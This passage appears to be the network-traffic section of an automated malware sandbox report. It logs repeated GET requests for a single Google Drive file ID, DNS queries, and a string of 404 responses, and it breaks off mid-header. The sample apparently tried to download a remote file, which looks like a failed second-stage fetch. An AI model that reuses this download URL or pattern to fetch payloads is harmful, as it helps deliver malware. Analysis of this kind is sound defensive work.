    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRVnzEkubO4dxbA2c_lHNNHU3gkwu5Z3a1mx4YHq7MsJCThrEt1Ygk9IlRJd0sRz5pPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:45 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-O8EOhVgXzqVX_3tCzStGeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY; expires=Sun, 13-Jul-2025 00:30:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSLAr3O-4BZf2vsFb4atsWpQh4euFalnzgm2yvrI01h8FRfh-TqMt56uXAcroKt4cLvKcAJvOMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3CsUnk7pfy73n0TI3cRNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTthHzghFAjLo31iEBd0f8rL1r9I933PHGhW0XWEfQngDfehJsponJQcV6GRYOly3lqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:50 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-q-qoYC80koCl7JdYDmO4RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTN1rVcSYi8FPkd4o5jbhTQyMaGHo5DkWllHrBDAXiGvipyTiOxFPUEEcvSZxp3lm6tuyW5-DMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-V2244LTKCvkr3-H0g9eCxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4FkAEpy9cpXTjGevKEliGRmQk6sLx2PvVkXuOonHF_NsHnSELMAjG2IEQdeq3mrv2AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ejR7Zf_6k2X81s4YVks1Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS43oOuhh8VWKFSSsSK-VS4bQuLCawZpz7hbTmVjepChF9GpZzZ-FT1_ZGV61RnXNzJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:57 GMTContent-Security-Policy: script-src 'nonce-RbIqqbL5A-sM2qw7ErJk9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRi-w3JwOID6ax-YpJ4pSxZDT_qA8ibee2LelrMfP5B3AItsVOVE2eQjQlXrcdvvaOCptnKKokContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:30:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-eZqXO2lSHEIBW-PRKOYQvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS3ZLSNlNlnKfl0pjGD_qC3CfrXse2RqnidZDa8kmV5d0x1Yfuu2ss7FuK8M6kgXSyEVd3MCqEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Zplys3F-QrkR2Tf1UlJkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR9CQUydRt0yrdvPr5FWKHkGSR-GLWkQ89J8Ox8wmvEcIMAmS9s4_6AaY1uJOz64NiuWda9PEwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:05 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-OIFR1feHDQyeBLkAQrC_uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQT9toTjWgdKh6DxPjXPLaj2ECBITLb7s7I90xOek1ZbmdI8EMbi7G7dDfSAU4R3-NZqVHpi_gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nvJWdXTtaOYcBjlTwwqBNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS-uvJDef7ImA_jWm2IJT3QhTXCjFVH8CZ5oH3flFotjfaLJlugKNQMfmEO5gybj_ucContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-naeiniOfAtBuiyOcB9hG6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 